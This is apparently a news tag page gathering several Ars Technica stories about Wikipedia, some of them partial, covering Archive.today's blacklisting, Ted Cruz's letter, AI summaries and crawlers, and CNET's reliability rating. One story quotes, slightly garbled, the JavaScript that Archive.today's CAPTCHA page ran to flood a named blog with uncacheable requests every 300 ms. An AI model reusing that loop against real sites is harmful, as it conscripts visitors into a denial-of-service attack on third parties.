wikipedia

wikipedia-blacklists-archive.today,-starts-removing-695,000-archive-links

Wikipedia blacklists Archive.today, starts removing 695,000 archive links

The English-language edition of Wikipedia is blacklisting Archive.today after the controversial archive site was used to direct a distributed denial of service (DDoS) attack against a blog.

In the course of discussing whether Archive.today should be deprecated because of the DDoS, Wikipedia editors discovered that the archive site altered snapshots of webpages to insert the name of the blogger who was targeted by the DDoS. The alterations were apparently fueled by a grudge against the blogger over a post that described how the Archive.today maintainer hid their identity behind several aliases.

“There is consensus to immediately deprecate archive.today, and, as soon as practicable, add it to the spam blacklist (or create an edit filter that blocks adding new links), and remove all links to it,” stated an update today on Wikipedia’s Archive.today discussion. “There is a strong consensus that Wikipedia should not direct its readers towards a website that hijacks users’ computers to run a DDoS attack (see WP:ELNO#3). Additionally, evidence has been presented that archive.today’s operators have altered the content of archived pages, rendering it unreliable.”

More than 695,000 links to Archive.today are distributed across 400,000 or so Wikipedia pages. The archive site is commonly used to bypass news paywalls, and the FBI has sought information on the site operator’s identity with a subpoena to domain registrar Tucows.

“Those in favor of maintaining the status quo rested their arguments primarily on the utility of archive.today for verifiability,” said today’s Wikipedia update. “However, an analysis of existing links has shown that most of its uses can be replaced. Several editors started to work out implementation details during this RfC [request for comment] and the community should figure out how to efficiently remove links to archive.today.”

Editors urged to remove links

Guidance published as a result of the decision asked editors to help remove and replace links to the following domain names used by the archive site: archive.today, archive.is, archive.ph, archive.fo, archive.li, archive.md, and archive.vn. The guidance says editors can remove Archive.today links when the original source is still online and has identical content; replace the archive link so it points to a different archive site, like the Internet Archive, Ghostarchive, or Megalodon; or “change the original source to something that doesn’t need an archive (e.g., a source that was printed on paper), or for which a link to an archive is only a matter of convenience.”

Wikipedia blacklists Archive.today, starts removing 695,000 archive links Read More »

archive.today-captcha-page-executes-ddos;-wikipedia-considers-banning-site

Archive.today CAPTCHA page executes DDoS; Wikipedia considers banning site


DDoS hit blog that tried to uncover Archive.today founder’s identity in 2023.

Credit: Getty Images | Riccardo Milani

Wikipedia editors are discussing whether to blacklist Archive.today because the archive site was used to direct a distributed denial of service (DDoS) attack against a blogger who wrote a post in 2023 about the mysterious website’s anonymous maintainer.

In a request for comment page, Wikipedia’s volunteer editors were presented with three options. Option A is to remove or hide all Archive.today links and add the site to the spam blacklist. Option B is to deprecate Archive.today, discouraging future link additions while keeping the existing archived links. Option C is to do nothing and maintain the status quo.

Option A in particular would be a huge change, as more than 695,000 links to Archive.today are used across 400,000 or so Wikipedia pages. Archive.today, also known as Archive.is, is a website that saves snapshots of webpages and is commonly used to bypass news paywalls.

“Archive.today uses advanced scraping methods, and is generally considered more reliable than the Internet Archive,” the Wikipedia request for comment said. “Due to concerns about botnets, linkspamming, and how the site is run, the community decided to blacklist it in 2013. In 2016, the decision was overturned, and archive.today was removed from the spam blacklist.”

Discussion among editors has been ongoing since February 7. “Wikipedia’s need for verifiable citations is absolutely not more important than the security of users,” one editor in favor of blacklisting wrote. “We need verifiable citations so that we can maintain readers’ trust, however, in order to be trustworthy our references also have to be safe to access.”

Archive would be hard to replace

On the other side, an editor who supported Option C wrote that “Archive.today contains a vast amount of archives available nowhere else. Not on Wayback Machine, nowhere. It is the second largest archive provider across all Wikimedia sites. Removal/blockage of this site will be disruptive daily for thousands of editors and readers. It will result in a huge proliferation of dead link tags that will never be resolved.”

Several posts mentioned an ongoing FBI case that could eventually make the Archive.today links useless anyway. Some said it would be better to act now than to have Option A forced on them later without a backup plan.

One editor supported starting with Option B and eventually shifting to Option A with “the proper end goal being the WMF [Wikimedia Foundation] supporting some sort of archive system, whether their own original or directly supporting the Internet Archive’s work so it can be done more systematically.”

Some discussion centered on copyright infringement, given that Archive.today publishes copies of many copyrighted articles. “On the general problem of linking to copyright infringement: perhaps the Wikimedia Foundation can work on ways to establish legally licensed archives of major paywalled sites, in partnership with archives such as the Internet Archive,” one editor wrote. “It would be challenging given the business model of those sites, but maybe a workable compromise can be established that manages how many Wikipedia editors [have] access at a given time.”

Malicious code in CAPTCHA page

The DDoS attack being discussed by Wikipedia editors was targeted at the Gyrovague blog written by Jani Patokallio. Last month, “the maintainers of Archive.today injected malicious code in order to perform a distributed denial of service attack against a person they were in dispute with,” the Wikipedia request for comment says. “Every time a user encounters the CAPTCHA page, their Internet connection is used to attack a certain individual’s blog.”

The trustworthiness of Archive.today was discussed in light of evidence that the site’s founder threatened to create “a new category of AI porn” in retaliation against the blogger. The AI porn threat was mentioned by several editors.

“I echo others [that Option] A is looking like something we’ll have to do eventually, anyways, and at least this way we have a chance to do it on our terms,” one editor wrote. “I hate to break it to you, but even if the FBI thing goes nowhere, a website whose operator apparently threatens to create AI porn in retaliation against enemies, using their names, isn’t a trustworthy mirror, and isn’t going to remain one.”

One editor reported being “miserable” about supporting Option A, “but we cannot permit websites to rope our readers into being part of DDoS attacks.” Moreover, “The fact is that most of the archive.today links on Wikipedia are not an attempt to save URLs that have now gone dead that the Internet Archive cannot handle, but efforts to bypass paywalls, which is convenient, but illegal. It’s strange that we accept links to archive.today for this purpose but don’t accept the same for Anna’s Archive or Sci-Hub,” the editor wrote.

Patokallio told us in an email today, “it’s true that there simply are no alternatives to archive.today for many sources that archive.org does not/cannot cover,” and that he hopes the Wikipedia request for comment “leads to the Wikimedia Foundation creating one as suggested by multiple commenters in the thread.”

We emailed the Archive.today’s webmaster address today about the Wikipedia discussion and will update this article if we get a response.

The Wikimedia Foundation, the nonprofit that hosts Wikipedia, chimed in on the discussion today. “Our view is that the value to verifiability that the site provides must be weighed against the security risks and violation of the trust of the people who click these links,” wrote Eric Mill, head of the foundation’s product safety and integrity group. “We (WMF) encourage the English Wikipedia community to carefully weigh the situation before making a decision on this unusual case.”

Noting that “Archive.today’s owner has not been deterred from continuing the ongoing DDoS,” Mill wrote that “the same actions that make archive.today unsafe may also reduce its usefulness for verifying content on Wikipedia. If the owners are willing to abuse their position to further their goals through malicious code, then it also raises questions about the integrity of the archive it hosts.”

It’s possible the Wikimedia Foundation will act even if the volunteer editors decide to maintain the status quo. “We know that WMF intervention is a big deal, but we also have not ruled it out, given the seriousness of the security concern for people who click the links that appear across many wikis,” Mill wrote.

Blogger tried to uncover founder’s identity

The Wikipedia request for comments acknowledged that whether to blacklist would be a difficult decision. There are “significant concerns for readers’ safety, as well as the long-term stability and integrity of the service,” but “a significant amount of people also think that mass-removing links to Archive.today may harm verifiability, and that the service is harder to censor than certain other archiving sites,” it said.

An update to the request for comments yesterday indicated that the attack temporarily stopped, but the malicious code had been reactivated. “Please do not visit the archive without blocking network requests to gyrovague.com to avoid being part of the attack!” it said.

The code’s first public mention was apparently in a Hacker News thread on January 14, and Patokallio wrote about the DDoS in a February 1 blog post. “Every 300 milliseconds, as long as the CAPTCHA page is open, this makes a request to the search function of my blog using a random string, ensuring the response cannot be cached and thus consumes resources,” he wrote. The Javascript code in the Archive.today CAPTCHA page is as follows:

        setInterval(function()               fetch("https://gyrovague.com/?s=" + Math.random().toString(36).substring(2, 3 + Math.random() 8),                   referrerPolicy: "no-referrer",                  mode: "no-cors"              );          , 300);

In August 2023, Patokallio wrote a post attempting to uncover the identity of Archive.today founder “Denis Petrov,” which seems to be an alias. Patokallio wasn’t able to figure out who the founder is but cobbled together various tidbits from Internet searches, including a Stack Exchange post that mentioned another potential alias, “Masha Rabinovich.”

Patokallio seemed to be driven by curiosity and was impressed by Archive.today’s work. “It’s a testament to their persistence that [they’ve] managed to keep this up for over 10 years, and I for one will be buying Denis/Masha/whoever a well deserved cup of coffee,” Patokallio’s 2023 post said. In his post this month, Patokallio said his 2023 blog “gathered some 10,000 views and a bit [of] discussion on Hacker News, but didn’t exactly set the blogosphere on fire. And indeed, absolutely nothing happened for the next two years and a bit.”

FBI case revives interest in 2023 blog

But in October 2025, the FBI sent a subpoena to domain registrar Tucows seeking “subscriber information on [the] customer behind archive.today” in connection with “a federal criminal investigation being conducted by the FBI.” We wrote about the subpoena, and our story included a link to Patokallio’s 2023 blog post in a sentence that said, “There are several indications that the [Archive.today] founder is from Russia.”

In an email to Ars, Patokallio told us that the DDoS attack “appears to be because you kindly mentioned my blog in your Nov 8, 2025 story.” Patokallio added that he is “as mystified by this as you probably are.” Articles about the subpoena by The Verge and Heise Online also linked to Patokallio’s 2023 blog post.

On January 8, 2026, Patokallio’s hosting company, Automattic, notified him that it received a GDPR [General Data Protection Regulation] complaint from a “Nora Puchreiner” alleging that the 2023 post “contains extensive personal data… presented in a narrative that is defamatory in tone and context.” Patokallio said that after he submitted a rebuttal, “Automattic sided with me and left the post up.”

Patokallio said he also “received a politely worded email from archive.today’s webmaster asking me to take down the post for a few months” on January 10. The email was classified as spam by Gmail, and he didn’t see it until five days later, he said. In the meantime, the DDoS started.

Patokallio said he replied to the webmaster’s email on January 15 and again on January 20 but didn’t hear back. He tried a third time on January 25, saying he would not take down the blog post but offered to “change some wording that you feel is being misrepresented.”

Emails threatened AI porn and other scams

Patokallio posted what he called a lightly redacted copy of the resulting email thread. The first email from the Archive.today webmaster said, “I do not mind the post, but the issue is: journos from mainstream media (Heise, Verge, etc) cherry-pick just a couple of words from your blog, and then construct very different narratives having your post the only citable source; then they cite each other and produce a shitty result to present for a wide audience.”

In a later email, “Nora Puchreiner” wrote, “I do not care on your blog and its content. I just need the links from Heise and other media to be 404.” One message threatened to investigate “your Nazi grandfather” and “vibecode a gyrovague.gay dating app.” Another threatened to create a public association between Patokallio’s name and AI porn.

A Tumblr blog post apparently written by the Archive.today founder seems to generally confirm the emails’ veracity, but says the original version threatened to create “a patokallio.gay dating app,” not “a gyrovague.gay dating app.” The Tumblr blog has several other recent posts criticizing Patokallio and accusing him of hiding his real name. However, the Gyrovague blog shows Patokallio’s name in a sidebar and discloses that he works for Google in Sydney, Australia, while stating that the blog posts contain only his personal views.

In one email, Patokallio included a link to Wikipedia’s page on the Streisand effect, a name for situations in which people seeking to suppress access to information instead draw more public attention to the information they want hidden. The Archive.today site maintainer apparently viewed this as a threat.

“And threatening me with Streisand… having such a noble and rare name, which in retaliation could be used for the name of a scam project or become a byword for a new category of AI porn… are you serious?” the email said. Patokallio responded, “No, you’re Streisanding yourself: the DDOS has already drawn more attention to my blog post than it had gotten in the last two years, with zero action on my side.”

A subsequent reply in the email thread contained the “Nazi grandfather” and “gay dating app” threats. Patokallio wrote that after these emails, it didn’t seem worthwhile to continue the discussion. “At this point it was pretty clear the conversation had run its course, so here we are,” Patokallio wrote in his February 1 blog post. “And for the record, my long-dead grandfather served in an anti-aircraft unit of the Finnish Army during WW2, defending against the attacks of the Soviet Union. Perhaps this is enough to qualify as a ‘Nazi’ in Russia these days.”

While the outcome at Wikipedia is not yet settled, Patokallio wrote that the DDoS attack didn’t cause him any real harm. The Archive.today maintainer apparently intended to make Patokallio’s hosting costs more expensive, but “I have a flat fee plan, meaning this has cost me exactly zero dollars,” he wrote.

This article was updated with a statement from the Wikimedia Foundation and further comment from Patokallio.

Photo of Jon Brodkin

Jon is a Senior IT Reporter for Ars Technica. He covers the telecom industry, Federal Communications Commission rulemakings, broadband consumer affairs, court cases, and government regulation of the tech industry.

Archive.today CAPTCHA page executes DDoS; Wikipedia considers banning site Read More »

ted-cruz-doesn’t-seem-to-understand-wikipedia,-lawyer-for-wikimedia-says

Ted Cruz doesn’t seem to understand Wikipedia, lawyer for Wikimedia says


A Wikipedia primer for Ted Cruz

Wikipedia host’s lawyer wants to help Ted Cruz understand how the platform works.

Senator Ted Cruz (R-Texas) uses his phone during a joint meeting of Congress on May 17, 2022. Credit: Getty Images | Bloomberg

The letter from Sen. Ted Cruz (R-Texas) accusing Wikipedia of left-wing bias seems to be based on fundamental misunderstandings of how the platform works, according to a lawyer for the nonprofit foundation that operates the online encyclopedia.

“The foundation is very much taking the approach that Wikipedia is actually pretty great and a lot of what’s in this letter is actually misunderstandings,” Jacob Rogers, associate general counsel at the Wikimedia Foundation, told Ars in an interview. “And so we are more than happy, despite the pressure that comes from these things, to help people better understand how Wikipedia works.”

Cruz’s letter to Wikimedia Foundation CEO Maryana Iskander expressed concern “about ideological bias on the Wikipedia platform and at the Wikimedia Foundation.” Cruz alleged that Wikipedia articles “often reflect a left-wing bias.” He asked the foundation for “documents sufficient to show what supervision, oversight, or influence, if any, the Wikimedia Foundation has over the editing community,” and “documents sufficient to show how the Wikimedia Foundation addresses political or ideological bias.”

As many people know, Wikipedia is edited by volunteers through a collaborative process.

“We’re not deciding what the editorial policies are for what is on Wikipedia,” Rogers said, describing the Wikimedia Foundation’s hands-off approach. “All of that, both the writing of the content and the determining of the editorial policies, is done through the volunteer editors” through “public conversation and discussion and trying to come to a consensus. They make all of that visible in various ways to the reader. So you go and you read a Wikipedia article, you can see what the sources are, what someone has written, you can follow the links yourselves.”

“They’re worried about something that is just not present at all”

Cruz’s letter raised concerns about “the influence of large donors on Wikipedia’s content creation or editing practices.” But Rogers said that “people who donate to Wikipedia don’t have any influence over content and we don’t even have that many large donors to begin with. It is primarily funded by people donating through the website fundraisers, so I think they’re worried about something that is just not present at all.”

Anyone unhappy with Wikipedia content can participate in the writing and editing, he said. “It’s still open for everybody to participate. If someone doesn’t like what it says, they can go on and say, ‘Hey, I don’t like the sources that are being used, or I think a different source should be used that isn’t there,'” Rogers said. “Other people might disagree with them, but they can have that conversation and try to figure it out and make it better.”

Rogers said that some people wrongly assume there is central control over Wikipedia editing. “I feel like people are asking questions assuming that there is something more central that is controlling all of this that doesn’t actually exist,” he said. “I would love to see it a little better understood about how this sort of public model works and the fact that people can come judge it for themselves and participate for themselves. And maybe that will have it sort of die down as a source of government pressure, government questioning, and go onto something else.”

Cruz’s letter accused Wikipedia of pushing antisemitic narratives. He described the Wikimedia Foundation as “intervening in editorial decisions” in an apparent reference to an incident in which the platform’s Arbitration Committee responded to editing conflicts on the Israeli–Palestinian conflict by banning eight editors.

“The Wikimedia Foundation has said it is taking steps to combat this editing campaign, raising further questions about the extent to which it is intervening in editorial decisions and to what end,” Cruz wrote.

Explaining the Arbitration Committee

The Arbitration Committee for the English-language edition of Wikipedia consists of volunteers who “are elected by the rest of the English Wikipedia editors,” Rogers said. The group is a “dispute resolution body when people can’t otherwise resolve their disputes.” The committee made “a ruling on Israel/Palestine because it is such a controversial subject and it’s not just banning eight editors, it’s also how contributions are made in that topic area and sort of limiting it to more experienced editors,” he said.

The members of the committee “do not control content,” Rogers said. “The arbitration committee is not a content dispute body. They’re like a behavior conduct dispute body, but they try to set things up so that fights will not break out subsequently.”

As with other topics, people can participate if they believe articles are antisemitic. “That is sort of squarely in the user editorial processes,” Rogers said. “If someone thinks that something on Wikipedia is antisemitic, they should change it or propose to people working on it that they change it or change sources. I do think the editorial community, especially on topics related to antisemitism and related to Israel/Palestine, has a lot of various safeguards in place. That particular topic is probably the most controversial topic in the world, but there’s still a lot of editorial safeguards in place where people can discuss things. They can get help with dispute resolution from bringing in other editors if there’s a behavioral problem, they can ask for help from Wikipedia administrators, and all the way up to the English Wikipedia arbitration committee.”

Cruz’s letter called out Wikipedia’s goal of “knowledge equity,” and accused the foundation of favoring “ideology over neutrality.” Cruz also pointed to a Daily Caller report that the foundation donated “to activist groups seeking to bring the online encyclopedia more in line with traditionally left-of-center points of view.”

Rogers countered that “the theory behind that is sort of misunderstood by the letter where it’s not about equity like the DEI equity, it is about the mission of the Wikimedia Foundation to have the world’s knowledge, to prepare educational content and to have all the different knowledge in the world to the extent possible.” In topic areas where people with expertise haven’t contributed much to Wikipedia, “we are looking to write grants to help fill in those gaps in knowledge and have a more broad range of information and sources,” he said.

What happens next

Rogers is familiar with the workings of Senate investigations from personal experience. He joined the Wikimedia Foundation in 2014 after working for the Senate’s Permanent Subcommittee on Investigations under the late Sen. Carl Levin (D-Mich.).

While Cruz demanded a trove of documents, Rogers said the foundation doesn’t necessarily have to provide them. A subpoena could be issued to Wikimedia, but that hasn’t happened.

“What Cruz has sent us is just a letter,” Rogers said. “There is no legal proceeding whatsoever. There’s no formal authority behind this letter. It’s just a letter from a person in the legislative branch who cares about the topic, so there is nothing compelling us to give him anything. I think we are probably going to answer the letter, but there’s no sort of legal requirement to actually fully provide everything that answers every question.” Assuming it responds, the foundation would try to answer Cruz’s questions “to the extent that we can, and without violating any of our company policies,” and without giving out nonpublic information, he said.

A letter responding to Cruz wouldn’t necessarily be made public. In April, the foundation received a letter from 23 lawmakers about alleged antisemitism and anti-Israel bias. The foundation’s response to that letter is not public.

Cruz is seeking changes at Wikipedia just a couple weeks after criticizing Federal Communications Commission Chairman Brendan Carr for threatening ABC with station license revocations over political content on Jimmy Kimmel’s show. While the pressure tactics used by Cruz and Carr have similarities, Rogers said there are also key differences between the legislative and executive branches.

“Congressional committees, they are investigating something to determine what laws to make, and so they have a little bit more freedom to just look into the state of the world to try to decide what laws they want to write or what laws they want to change,” he said. “That doesn’t mean that they can’t use their authority in a way that might ultimately go down a path of violating the First Amendment or something like that. They have a little bit more runway to get there versus an executive branch agency which, if it is pressuring someone, it is doing so for a very immediate decision usually.”

What does Cruz want? It’s unclear

Rogers said it’s not clear whether Cruz’s inquiry is the first step toward changing the law. “The questions in the letter don’t really say why they want the information they want other than the sort of immediacy of their concerns,” he said.

Cruz chairs the Senate Commerce Committee, which “does have lawmaking authority over the Internet writ large,” Rogers said. “So they may be thinking about changes to the law.”

One potential target is Section 230 of the Communications Decency Act, which gives online platforms immunity from lawsuits over how they moderate user-submitted content.

“From the perspective of the foundation, we’re staunch defenders of Section 230,” Rogers said, adding that Wikimedia supports “broad laws around intellectual property and privacy and other things that allow a large amount of material to be appropriately in the public domain, to be written about on a free encyclopedia like Wikipedia, but that also protect the privacy of editors who are contributing to Wikipedia.”

Photo of Jon Brodkin

Jon is a Senior IT Reporter for Ars Technica. He covers the telecom industry, Federal Communications Commission rulemakings, broadband consumer affairs, court cases, and government regulation of the tech industry.

Ted Cruz doesn’t seem to understand Wikipedia, lawyer for Wikimedia says Read More »

ted-cruz-picks-a-fight-with-wikipedia,-accusing-platform-of-left-wing-bias

Ted Cruz picks a fight with Wikipedia, accusing platform of left-wing bias

Cruz pressures Wikipedia after criticizing FCC chair

Cruz sent the letter about two weeks after criticizing Federal Communications Commission Chairman Brendan Carr for threatening ABC with station license revocations over political content on Jimmy Kimmel’s show. Cruz said that using the government to dictate what the media can say “will end up bad for conservatives” because when Democrats are back in power, “they will silence us, they will use this power, and they will use it ruthlessly.” Cruz said that Carr threatening ABC was like “a mafioso coming into a bar going, ‘Nice bar you have here, it’d be a shame if something happened to it.'”

Cruz, who chairs the Senate Commerce Committee, doesn’t mind using his authority to pressure Wikipedia’s operator, however. “The Standing Rules of the Senate grant the Committee on Commerce, Science, and Transportation jurisdiction over communications, including online information platforms,” he wrote to the Wikimedia Foundation. “As the Chairman of the Committee, I request that you provide written responses to the questions below, as well as requested documents, no later than October 17, 2025, and in accordance with the attached instructions.”

We asked Cruz’s office to explain why a senator pressuring Wikipedia is appropriate while an FCC chair pressuring ABC is not and will update this article if we get a response.

Among other requests, Cruz asked for “documents sufficient to show what supervision, oversight, or influence, if any, the Wikimedia Foundation has over the editing community,” and “documents sufficient to show how the Wikimedia Foundation addresses political or ideological bias.”

Cruz has separately been launching investigations into the Biden administration for alleged censorship. He issued a report allegedly “revealing how the Biden administration transformed the Cybersecurity and Infrastructure Security Agency (CISA) into an agent of censorship pressuring Big Tech to police speech,” and scheduled a hearing for Wednesday titled, “Shut Your App: How Uncle Sam Jawboned Big Tech Into Silencing Americans.”

Cruz’s letter to Wikimedia seeks evidence that could figure into his ongoing investigations into the Biden administration. “Provide any and all documents and communications—including emails, texts, or other digital messages—between any officer, employee, or agent of the Wikimedia Foundation and any officer, employee, or agent of the federal government since January 1, 2020,” the letter said.

Ted Cruz picks a fight with Wikipedia, accusing platform of left-wing bias Read More »

dedicated-volunteer-exposes-“single-largest-self-promotion-operation-in-wikipedia’s-history”

Dedicated volunteer exposes “single largest self-promotion operation in Wikipedia’s history”

After a reduction in activity, things ramped up again in 2021, as IP addresses from around the world started creating Woodard references and articles once more. For instance, “addresses from Canada, Germany, Indonesia, the UK and other places added some trivia about Woodard to all 15 Wikipedia articles about the calea ternifolia.”

Then things got “more sophisticated.” From December 2021 through June 2025, 183 articles were created about Woodard, each in a different language’s Wikipedia and each by a unique account. These accounts followed a pattern of behavior: They were “created, often with a fairly generic name, and made a user page with a single image on it. They then made dozens of minor edits to unrelated articles, before creating an article about David Woodard, then making a dozen or so more minor edits before disappearing off the platform.”

Grnrchst believes that all the activity was meant to “create as many articles about Woodard as possible, and to spread photos of and information on Woodard to as many articles as possible, while hiding that activity as much as possible… I came to believe that David Woodard himself, or someone close to him, had been operating this network of accounts and IP addresses for the purposes of cynical self-promotion.”

After the Grnrchst report, Wikipedia’s global stewards removed 235 articles on Woodard from Wikipedia instances with few users or administrators. Larger Wikipedias were free to make their own community decisions, and they removed another 80 articles and banned numerous accounts.

“A full decade of dedicated self-promotion by an individual network has been undone in only a few weeks by our community,” Grnrchst noted.

In the end, just 20 articles about Woodard remain, such as this one in English, which does not mention the controversy.

We were unable to get in touch with Woodard, whose personal website is password-protected and only available “by invitation.”

Could the whole thing be some kind of “art project,” with the real payoff being exposure and being written about? Perhaps. But whatever the motive behind the decade-long effort to boost Woodard on Wikipedia, the incident reminds us just how much effort some people are willing to put into polluting open or public-facing projects for their own ends.

Dedicated volunteer exposes “single largest self-promotion operation in Wikipedia’s history” Read More »

“yuck”:-wikipedia-pauses-ai-summaries-after-editor-revolt

“Yuck”: Wikipedia pauses AI summaries after editor revolt

Generative AI is permeating the Internet, with chatbots and AI summaries popping up faster than we can keep track. Even Wikipedia, the vast repository of knowledge famously maintained by an army of volunteer human editors, is looking to add robots to the mix. The site began testing AI summaries in some articles over the past week, but the project has been frozen after editors voiced their opinions. And that opinion is: “yuck.”

The seeds of this project were planted at Wikimedia’s 2024 conference, where foundation representatives and editors discussed how AI could advance Wikipedia’s mission. The wiki on the so-called “Simple Article Summaries” notes that the editors who participated in the discussion believed the summaries could improve learning on Wikipedia.

According to 404 Media, Wikipedia announced the opt-in AI pilot on June 2, which was set to run for two weeks on the mobile version of the site. The summaries appeared at the top of select articles in a collapsed form. Users had to tap to expand and read the full summary. The AI text also included a highlighted “Unverified” badge.

Feedback from the larger community of editors was immediate and harsh. Some of the first comments were simply “yuck,” with others calling the addition of AI a “ghastly idea” and “PR hype stunt.”

Others expounded on the issues with adding AI to Wikipedia, citing a potential loss of trust in the site. Editors work together to ensure articles are accurate, featuring verifiable information and a neutral point of view. However, nothing is certain when you put generative AI in the driver’s seat. “I feel like people seriously underestimate the brand risk this sort of thing has,” said one editor. “Wikipedia’s brand is reliability, traceability of changes, and ‘anyone can fix it.’ AI is the opposite of these things.”

“Yuck”: Wikipedia pauses AI summaries after editor revolt Read More »

ai-bots-strain-wikimedia-as-bandwidth-surges-50%

AI bots strain Wikimedia as bandwidth surges 50%

Crawlers that evade detection

Making the situation more difficult, many AI-focused crawlers do not play by established rules. Some ignore robots.txt directives. Others spoof browser user agents to disguise themselves as human visitors. Some even rotate through residential IP addresses to avoid blocking, tactics that have become common enough to force individual developers like Xe Iaso to adopt drastic protective measures for their code repositories.

This leaves Wikimedia’s Site Reliability team in a perpetual state of defense. Every hour spent rate-limiting bots or mitigating traffic surges is time not spent supporting Wikimedia’s contributors, users, or technical improvements. And it’s not just content platforms under strain. Developer infrastructure, like Wikimedia’s code review tools and bug trackers, is also frequently hit by scrapers, further diverting attention and resources.

These problems mirror others in the AI scraping ecosystem over time. Curl developer Daniel Stenberg has previously detailed how fake, AI-generated bug reports are wasting human time. On his blog, SourceHut’s Drew DeVault highlight how bots hammer endpoints like git logs, far beyond what human developers would ever need.

Across the Internet, open platforms are experimenting with technical solutions: proof-of-work challenges, slow-response tarpits (like Nepenthes), collaborative crawler blocklists (like “ai.robots.txt“), and commercial tools like Cloudflare’s AI Labyrinth. These approaches address the technical mismatch between infrastructure designed for human readers and the industrial-scale demands of AI training.

Open commons at risk

Wikimedia acknowledges the importance of providing “knowledge as a service,” and its content is indeed freely licensed. But as the Foundation states plainly, “Our content is free, our infrastructure is not.”

The organization is now focusing on systemic approaches to this issue under a new initiative: WE5: Responsible Use of Infrastructure. It raises critical questions about guiding developers toward less resource-intensive access methods and establishing sustainable boundaries while preserving openness.

The challenge lies in bridging two worlds: open knowledge repositories and commercial AI development. Many companies rely on open knowledge to train commercial models but don’t contribute to the infrastructure making that knowledge accessible. This creates a technical imbalance that threatens the sustainability of community-run platforms.

Better coordination between AI developers and resource providers could potentially resolve these issues through dedicated APIs, shared infrastructure funding, or more efficient access patterns. Without such practical collaboration, the platforms that have enabled AI advancement may struggle to maintain reliable service. Wikimedia’s warning is clear: Freedom of access does not mean freedom from consequences.

AI bots strain Wikimedia as bandwidth surges 50% Read More »

ai-generated-articles-prompt-wikipedia-to-downgrade-cnet’s-reliability-rating

AI-generated articles prompt Wikipedia to downgrade CNET’s reliability rating

The hidden costs of AI —

Futurism report highlights the reputational cost of publishing AI-generated content.

The CNET logo on a smartphone screen.

Wikipedia has downgraded tech website CNET’s reliability rating following extensive discussions among its editors regarding the impact of AI-generated content on the site’s trustworthiness, as noted in a detailed report from Futurism. The decision reflects concerns over the reliability of articles found on the tech news outlet after it began publishing AI-generated stories in 2022.

Around November 2022, CNET began publishing articles written by an AI model under the byline “CNET Money Staff.” In January 2023, Futurism brought widespread attention to the issue and discovered that the articles were full of plagiarism and mistakes. (Around that time, we covered plans to do similar automated publishing at BuzzFeed.) After the revelation, CNET management paused the experiment, but the reputational damage had already been done.

Wikipedia maintains a page called “Reliable sources/Perennial sources” that includes a chart featuring news publications and their reliability ratings as viewed from Wikipedia’s perspective. Shortly after the CNET news broke in January 2023, Wikipedia editors began a discussion thread on the Reliable Sources project page about the publication.

“CNET, usually regarded as an ordinary tech RS [reliable source], has started experimentally running AI-generated articles, which are riddled with errors,” wrote a Wikipedia editor named David Gerard. “So far the experiment is not going down well, as it shouldn’t. I haven’t found any yet, but any of these articles that make it into a Wikipedia article need to be removed.”

After other editors agreed in the discussion, they began the process of downgrading CNET’s reliability rating.

As of this writing, Wikipedia’s Perennial Sources list currently features three entries for CNET broken into three time periods: (1) before October 2020, when Wikipedia considered CNET a “generally reliable” source; (2) between October 2020 and October 2022, where Wikipedia notes that the site was acquired by Red Ventures in October 2020, “leading to a deterioration in editorial standards” and saying there is no consensus about reliability; and (3) between November 2022 and present, where Wikipedia currently considers CNET “generally unreliable” after the site began using an AI tool “to rapidly generate articles riddled with factual inaccuracies and affiliate links.”

A screenshot of a chart featuring CNET's reliability ratings, as found on Wikipedia's

Enlarge / A screenshot of a chart featuring CNET’s reliability ratings, as found on Wikipedia’s “Perennial Sources” page.

Futurism reports that the issue with CNET’s AI-generated content also sparked a broader debate within the Wikipedia community about the reliability of sources owned by Red Ventures, such as Bankrate and CreditCards.com. Those sites published AI-generated content around the same period of time as CNET. The editors also criticized Red Ventures for not being forthcoming about where and how AI was being implemented, further eroding trust in the company’s publications. This lack of transparency was a key factor in the decision to downgrade CNET’s reliability rating.

In response to the downgrade and the controversies surrounding AI-generated content, CNET issued a statement that claims that the site maintains high editorial standards.

“CNET is the world’s largest provider of unbiased tech-focused news and advice,” a CNET spokesperson said in a statement to Futurism. “We have been trusted for nearly 30 years because of our rigorous editorial and product review standards. It is important to clarify that CNET is not actively using AI to create new content. While we have no specific plans to restart, any future initiatives would follow our public AI policy.”

This article was updated on March 1, 2024 at 9: 30am to reflect fixes in the date ranges for CNET on the Perennial Sources page.

AI-generated articles prompt Wikipedia to downgrade CNET’s reliability rating Read More »